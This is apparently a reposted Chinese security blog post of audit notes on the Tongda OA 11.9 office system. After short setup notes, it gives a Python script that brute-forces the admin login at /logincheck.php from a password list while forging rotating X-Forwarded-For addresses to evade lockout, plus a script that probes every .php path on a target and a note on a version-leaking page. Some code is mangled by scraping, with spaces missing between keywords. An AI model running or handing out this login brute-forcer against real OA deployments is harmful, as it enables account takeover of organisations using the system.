通达oa 作为攻防演练中出场率较高的一套 OA 系统,决定先从历史漏洞开始挖掘分析,对通达oa 有一个初步的了解
通达oa 11.9 的下载地址 默认安装地址是 D:MYOA 联网状态下会自动更新到通达 oa 11.10
安装成功后,登录界面如下 默认账号为 admin 对应密码为空
import requests
import sys
import re
def read_passwd(passwordfile):
withopen(file = passwordfile, mode='r') as f:
passwd = f.read().splitlines()
return passwd
def Intruder_password(url,username,passwd_list):
success_str ="正在进入OA系统,请稍候..."
a=b=c=d=0
url = url +"/logincheck.php"
for passwd in passwd_list:
payload ="UNAME={}&PASSWORD={}&encode_type=1".format(username,passwd)
headers = { "X-Forwarded-For": "{}.{}.{}.{}".format(a,b,c,d),"Content-Type": "application/x-www-form-urlencoded"}
response = requests.request("POST", url, data=payload, headers=headers)
if(re.search(success_str, response.text)):
print("正确的账号名:{}密码:{}".format(username,passwd))
else:
print("错误密码:{}".format(passwd))
d=d+1
if(d ==255):
c = c +1
d =0
if(c ==255):
b = b +1
c =0
if(b ==255):
a = a +1
b =0
def main():
iflen(sys.argv) <4:
print("Usage: Intruder_password.py targeturl username passwdfilen"
"Example: python Intruder_password.py http://10.0.18.1:80 admin passwd.txt")
exit()
url = sys.argv[1]
username = sys.argv[2]
passwd_list = read_passwd(sys.argv[3])
Intruder_password(url,username,passwd_list)
if__name__=='__main__':
main()
import os
import sys
import requests
def file_path(url,filefolder):
for root, dirs, files in os.walk(filefolder):
for f in files:
paths = os.path.join(root,f)
paths = paths.replace(filefolder,url)
paths = paths.replace("\","/")
#print(paths)
if(f.endswith(".php")):
response = requests.get(paths)
# print(str(response.status_code)+" "+str(len(response.text))+" "+paths)
print("code:"+str(response.status_code) +" len:"+str(len(response.text))+" url: "+ paths )
def main():
iflen(sys.argv) <3:
print("Usage: file_path.py targeturl filefoldern"
"Example: python file_path.py http://10.0.18.1:80 "C:\Users\admin\Desktop\MYOA\webroot"")
exit()
url = sys.argv[1]
filefolder = sys.argv[2]
file_path(url,filefolder)
if__name__=='__main__':
main()
http://10.0.18.1/inc/reg.php 泄露版本信息
链接:https://www.hetianlab.com/expc.do?ec=ECIDb9ac-4540-46b4-b676-22df36b5935b
征集原创技术文章中,欢迎投递
投稿邮箱:[email protected]
文章类型:黑客极客技术、信息安全热点安全研究分析等安全相关
通过审核并发布能收获200-800元不等的稿酬。
原文始发于微信公众号(合天网安实验室):某OA 审计小记
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论